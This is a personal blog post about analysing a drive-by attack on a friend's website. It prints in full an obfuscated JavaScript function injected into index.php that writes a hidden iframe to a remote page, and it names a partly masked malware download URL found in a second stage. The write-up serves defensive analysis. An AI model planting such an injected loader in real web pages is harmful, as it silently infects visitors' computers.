My Encounter with Live Web Attack

It will not be an average day, I knew from the dawn, as EOD I will be on my way to Pune. You might think whats so special about visiting pune?
Let me tell you, people who have spent at least a year or two in city like Pune or Bangalore will hate to stay in Hyderabad unless they have grown up there or some other solid reason. For me it was almost 1.7 yrs away from my favorite city. This feeling of excitment happens everytime i book my ticket to pune. Lot of reasons behind it like – Meeting Old Friends, Enjoying the super cool weather,Adventurous trek and most important Chicks 😉

Yes Hyderabad sucks in both quality and quantity as compare to Pune n B’lore.
Anyways, office started at 10 AM and We all were told to change cubicles. Don’t ask why, its a long story and is the effect of global recession. I checked emails, had a coffee and was about to start work . Office boy came to my place and said ” Sir, Aapka cube move karna hai..” ( We are moving your cubicle sir)
I knew it will take at least an hour to relocate him my small lab. I preferred to supervise and made sure my existing network configuration was intact. I wanted a smooth transit just like kernel does for a process. Kernel puts process in running state after being swapped out for time being without letting she know  😉 )

After couple of hours, I was all set in my new place. I opened up the terminal and resumed where i left yesterday, ( Yes i stopped carrying office work to home.) but couldn’t concentrate. My head was running with all the plans to execute after landing in Pune.
Suddenly I got a call from one of my good friend from Pune who works as a Web Developer for small firm. I thought he is going to ask about my Itinerary and plans about latest trek but I was wrong.  He sounded very serious and disturbed. He told me that he is been handover a project(web-site maintainance) from some days which was developed by his Ex-Colleague and from past 2-3 days that site is not behaving properly. Many people reported their system is behaving weired after visiting the site. He also found some junk code in the sources. This was enough for me to raise alert.  He asked me If i could help and that when it all started.

In matter of minutes I had all the required infected source code in my Inbox.  I went to cafeteria and grab a coffee before starting my analysis.

Stage I

I saw it was a JavaScript injected in his index.php. A function was injected which was getting called everytime page is loaded from <Body> tag.

function a1(s){b='';for(i=0;i<s.length;i+=4>>1)b+=s.charAt(i);return b;}document.write(a1('74u\x64n\151k\x76n40o\x73w\164n
\x79 \154o\x65b75f\x22u\166s\x69c\163a
\x69t\142i\x69o\154n\x69u\164n\x79k72n
\x68o\151w\x64n\144 \x65o\156b\x22f76u
\x3cs\151c\x66a\162t\x61i\155o\x65n40u
\x73n\162k\x63n75o\x22w\150n\x74 \164o
\x70b72f\x2fu57s\x77c\145a\x74t55i
\x68o\157n\x6cu\145n\x2ek\143n\x6fo\155w
\x2fn\142 \x69o\156b\x2ff\151u\x6es\144c
\x65a\170t\x2ei\160o\x68n\160u\x22n40k
\x76n\151o\x73w\151n\x62 \151o\x6cb\151f
\x74u\171s\x3ac\150a\x69t\144i\x64o\145n
\x6eu40n\x77k\151n\x64o\164w\x68n75
\x31o60b\x30f40u\x68s\145c\x69a\147t
\x68i\164o\x3dn70u\x30n76k\x3cn57o
\x69w\146n\x72 \141o\x6db\145f\x3eu74s
\x2fc\144a\x69t\166i\x3eo'));

Looking at the document.write() at the end, I recalled the SANS Diary story about decoding JavaScript. A quick use of Lazy method showed me an Hidden Iframe is calling some remote index.php from the function. Pretty easy though. Refer Screenshot.

stage1

I went on my Bactrack VM and wget the target index.php for second stage of my analysis.

Stage II

Just like I guessed, this PHP page has highly obfuscated JavaScript inside. This time i used textarea trick to decode. When launched under firefox, i got the another obfuscated Javascript this time with calls to eval() and argument.callee.toString().
Call to Argument.Callee.toString(), confirmed that I am not supposed to change the function in any way. This function call references itself and thus can detect any modifications.

Function started with Eval(Function(<Obfuscated code inside>))

I am not going to explain the total de-obfuscation story. To cut it short, I always prefer to google before starting any analysis and try to avoid repeatative analysis. This time when I asked google that weather she knows this mess, she replied with a pandalabs link. Code looked similar to the one analyzed by pandalabs. It was easy then.
Just to cut it short, after removing html tags the pure javascript code was fed to Rhino.  Rhino executed the whole JS inside and showed the actual URL which was the culprit behind installing the Malware on the end users computer.
antimalxxxxscan.com/xxxx.exe [Anyways site is blocked now]

I was not able to get the sample of original backdoor as it was removed from the site. It was for sure that ISP hosting the site was compromised and all the hosted domains were reported as Harmful by google. I asked my friend to bring this concern in his ISP’s consideration and pointed him to Google safety measures as I left for my dream city.

References:

  1. SANS Diary
  2. JavaScript De-Obfuscation with Rhino
  3. Cleaning and Securing your site.
Advertisements

About this entry